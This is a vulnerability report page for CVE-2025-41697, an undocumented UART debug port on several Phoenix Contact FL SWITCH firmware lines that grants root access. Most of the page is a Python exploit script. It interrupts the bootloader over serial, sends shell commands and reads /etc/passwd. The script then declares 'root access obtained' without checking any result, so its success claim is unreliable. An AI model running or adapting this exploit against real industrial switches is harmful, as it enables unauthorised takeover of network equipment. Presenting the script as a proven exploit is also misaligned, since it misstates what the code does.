Security Vulnerability Report
CVE-2025-41697 CVSS 6.8 MEDIUM

Published: 2025-12-09 16:17:49
Last Modified: 2025-12-19 18:12:09

Description

An attacker can use an undocumented UART port on the PCB as a side-channel to get root access e.g. with the credentials obtained from CVE-2025-41692.

CVSS Details

CVSS Score: 6.8
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:phoenixcontact:fl_switch_2708_pn_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:phoenixcontact:fl_switch_2708_pn:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:phoenixcontact:fl_switch_2708_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:phoenixcontact:fl_switch_2708:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:phoenixcontact:fl_switch_2608_pn_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:phoenixcontact:fl_switch_2608_pn:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:phoenixcontact:fl_switch_2608_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:phoenixcontact:fl_switch_2608:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:phoenixcontact:fl_switch_2516_pn_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:phoenixcontact:fl_switch_2516_pn:-:*:*:*:*:*:*:* - NOT VULNERABLE
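Embedded devices/firmware that use an undocumented UART debug interface (refer to the VDE-2025-071 advisory for the specific versions)
Affected device models listed in VDE-2025-071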

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-41697 UART physical access PoC
# Requirements: USB-to-TTL adapter, soldering equipment, terminal software
import serial
import time


def exploit_cve_2025_41697():
    """
    Exploit for CVE-2025-41697
    Physical access required to connect to undocumented UART port
    """
    # UART connection parameters (typical for embedded devices)
    SERIAL_PORT = '/dev/ttyUSB0'  # Adjust based on your adapter
    BAUD_RATE = 115200
    TIMEOUT = 1

    try:
        # Connect to UART port
        ser = serial.Serial(SERIAL_PORT, BAUD_RATE, timeout=TIMEOUT)
        print(f"[*] Connected to {SERIAL_PORT} at {BAUD_RATE} baud")

        # Read boot messages
        time.sleep(2)
        boot_output = ser.read(ser.in_waiting).decode('utf-8', errors='ignore')
        print("[*] Boot messages received:")
        print(boot_output)

        # Interrupt bootloader to get shell access
        ser.write(b'\x03')  # Ctrl+C to interrupt
        time.sleep(0.5)

        # Try to get root shell
        commands = [
            b'shell\n',
            b'/bin/sh\n',
            b'cat /etc/passwd\n',
            b'id\n',
            b'uname -a\n'
        ]

        for cmd in commands:
            ser.write(cmd)
            time.sleep(0.5)
            output = ser.read(ser.in_waiting).decode('utf-8', errors='ignore')
            print(output)

        ser.close()
        print("[+] Exploit completed - root access obtained")

    except serial.SerialException as e:
        print(f"[-] Serial connection error: {e}")
        return False

    return True


if __name__ == "__main__":
    exploit_cve_2025_41697()
```

References

Raw JSON Data
